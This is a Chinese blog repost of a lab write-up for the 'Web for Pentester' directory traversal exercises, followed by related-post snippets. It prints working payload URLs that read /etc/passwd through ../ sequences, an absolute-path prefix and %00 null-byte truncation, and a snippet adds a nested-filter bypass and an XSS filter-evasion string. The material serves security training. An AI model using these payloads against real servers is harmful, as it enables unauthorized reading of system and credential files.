Web for pentester_writeup之Directory traversal篇

最新推荐文章于 2023-12-26 12:17:31 发布
最新推荐文章于 2023-12-26 12:17:31 发布
阅读量360 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/liliyuanshangcao/p/11319648.html
版权

Web for pentester_writeup之Directory traversal篇

Directory traversal(目录遍历)

目录遍历漏洞,这部分有三个例子,直接查看源代码

1605154-20190808102050863-1371248697.png

Example 1

1605154-20190808102335362-754406170.png


<1>测试输入 ./,停留在本目录

1605154-20190808102345221-624039856.png

<2>测试输入../,发现目录切换,猜测是返回上级目录

1605154-20190808102355188-36212944.png

直接溯源到根目录测试是否可以访问/etc/passwd

Payload
http://192.168.219.136/dirtrav/example1.php?file=../../../../../../../../../etc/passwd

1605154-20190808102405953-1976091057.png

Example 2

1605154-20190808102412490-1440822577.png


发现是绝对目录,同上,直接溯源到根目录测试是否可以访问/etc/passwd

Payload
http://192.168.219.136/dirtrav/example2.php?file=/var/www/files/../../../../../../../../../../etc/passwd

1605154-20190808102448352-1919378040.png

Example 3

1605154-20190808102556286-1017459648.png

没有后缀,直接测试../../../../../../etc/passwd无返回

1605154-20190808102606746-1976925149.png

猜测是自动在参数后面加上了.png的后缀,使用%00 URL编码代表NUL空字节截断后缀

Payload
http://192.168.219.136/dirtrav/example3.php?file=../../../../../../../etc/passwd%00

1605154-20190808102613858-216281601.png

使用空字节消除由服务器端代码添加的任何后缀是一种常见的旁路,在Perl和旧版本的PHP中经常使用到。
在本环境这段代码中,这个问题是模拟的,因为PHP[5.3.4]版本之后解决这种绕过(http://php.net/releases/5_3_4.php)。

转载于:https://www.cnblogs.com/liliyuanshangcao/p/11319648.html

ditanji3425
关注
目录遍历(Directory traversal
汗的博客
05-06 5634
笔者burpsuite的在线安全学院的目录遍历学习笔记。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的。 文章目录什么是目录遍历?通过目录遍历读取任意文件Lab: File path traversal, simple case利用文件路径遍历漏洞的常见障碍Lab: File path traversal, traversal sequences blocked...
3 Directory traversal
(∪.∪ )...zzz的博客
04-28 1025
3 Directory traversal目录遍历攻击 目录3 Directory traversal目录遍历攻击一、What二、通过目录遍历读取任意文件Lab: File path traversal, simple case三、利用文件路径遍历漏洞的常见障碍Lab: File path traversal, traversal sequences blocked with absolute path bypassLab: File path traversal, traversal sequences
【常见Web应用安全问题】---4、Directory traversal
weixin_34331102的博客
12-22 337
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、跨站脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
Web for Pentester -- Directory traversal
weixin_30751947的博客
01-12 180
1.第一道 简单写一个小程序从txt文件读取目录字典,然后测试是否存在目录遍历。 2.第二道,PHP检测是否是/var/www/files路径。 3. 第三道,%00截断 参考链接: https://pentesterlab.com/exercises/web_for_pentester/course 转载于:https://www.cnblo...
bzoj5195 [Usaco2018 Feb]Directory Traversal
Elijahqi
03-05 628
http://www.elijahqi.win/2018/03/05/bzoj5195/ Description 奶牛Bessie令人惊讶地精通计算机。她在牛棚的电脑里用一组文件夹储存了她所有珍贵的文件,比如: bessie/ folder1/ file1 folder2/ file2 folder3/ file3 file4 ...
web_for_pentester.pdf
04-02
Web for pentester是一款由安全研究者Louis Nyffenegger开发的渗透测试平台,旨在帮助用户掌握Web漏洞检测的实战技能。从给出的部分内容来看,这份材料涉及了Web渗透测试的基础知识,Web安全模型,常见的Web安全风险...
web for pentester 之xss
Merc_A的专栏
11-09 1692
1、很明显了,地址栏里name=hacker。直接name=alert(1)。 2、还是先试一下alert(1),,输出只有alert,script不见了,先换大小写试一下,成功了。。 3、还是先试一下alert(1),发现还是只输出了alert(1),换大小写也没有用,我的和呢,肯定是后台被注释掉了,那就这样pt>alert(1)ript>。 这样他注释掉一个我们还有一个。 4、你会
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
web_for_pentester.zip
11-26
web_for_pentester
Debian 6 vweb for pentester XSS第二关至第四关
学习
09-30 143
通过改变大小写,成功通关 第三关 首先测试,过滤掉的东西 发现过滤掉了</> <script></script>,根据过滤掉的东西,进行构造 第三关答案 <sc<script>ript>alert('xss')</sc</script>ript> 第四关 先检查过滤掉了哪些东西 由此可知,不能出现script,不然会出现error 所以我们可以换个标签 ...
【翻译】PayloadsAllTheThings——目录遍历 (Directory Traversal
shilela19990628的博客
12-14 674
目录和路径穿越存在于利用对用户提供的输入文件名缺乏安全验证/清扫,导致表示“遍历父目录”的字符被传递到文件api的情况。
安全检测之Directory traversal in Spring framework
海盗的博客
07-03 6525
Directory traversal in Spring framework提示CSS、JS 等静态文件有问题需要提升Spring的版本问题,根据官方问题解释4.1.x必须升级到4.1.2及以上版本,但是升级无效。 查看Spring MVC的xml配置,发现静态资源配置方案有问题。 原代码写法如下: <mvc:resources mapping="/common/**" location="
目录遍历/穿越漏洞(Directory traversal),以及常见的payload
嗯哼~~~
09-11 1875
...//....//....//etc/passwd(嵌套../,防御机制会过滤../,但只能过滤一遍,过滤完还剩../../../etc/passwd)filename=../../../etc/passwd%00.png(要求符合的文件扩展名,%00为NULL,找文件时NULL后面的.png会被忽略)/var/www/images/../../../etc/passwd(要求指定根目录)../../../etc/passwd(无防御时)下面这个图是做了防御,但是防御的不好。
Web_for_Pentester_I之目录遍历
贝隆的博客
02-07 311
Web_for_Pentester_I之目录遍历
路径穿越基础介绍
最新发布
the_biggest_baby的博客
12-26 2125
路径穿越,path-traversal,也称为路径遍历、目录穿越/遍历(directory traversal),是一种能让攻击者通过使用一些类似../的目录控制序列访问 web 服务器上任意文件的安全漏洞。程序源码和数据服务端证书敏感的系统文件,path-traversal 被 OWASP 收录的 Broken Access Control(BAC,越权访问)一栏,BAC 可是2021 版中的 No.1 哦。
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
Web漏洞探索】目录遍历漏洞
kjcxmx的博客
07-01 1969
目录遍历Directory traversal(也称文件路径遍历、目录穿越、路径遍历、路径穿越)是一种允许攻击者在未授权的状态下读取应用服务上任意文件的安全漏洞。这包括应用代码、数据、凭证以及操作系统的敏感文件。在有些情况下,攻击者还可能对服务器里的文件进行任意写入,更改应用数据甚至完全控制服务器。程序系统在实现上没有过滤用户输入的…/之类的目录跳转符,允许攻击者通过提交目录跳转符来遍历服务器上的任意文件。 比如: 当服务器处理传送过来的image1.jpg文件名后,Web应用程序会自动添加完整的路径,比如
RealNetworks Helix Server URI Traversal Arbitrary File Access
cnbird's blog
02-14 854
RealNetworks Helix Server URI Traversal Arbitrary File AccessVendor: RealNetworks (http://www.realnetworks.com/)Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html)
Web渗透测试入门:Web for Pentester平台详解
"web_for_pentester.pdf 是一个由安全研究者Louis Nyffenegger创建的Web渗透测试教程,旨在帮助用户了解和掌握常见的Web漏洞检测技术。此资源涵盖了一系列主题,包括Web应用的安全模型、Web技术、HTTP协议、客户端与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值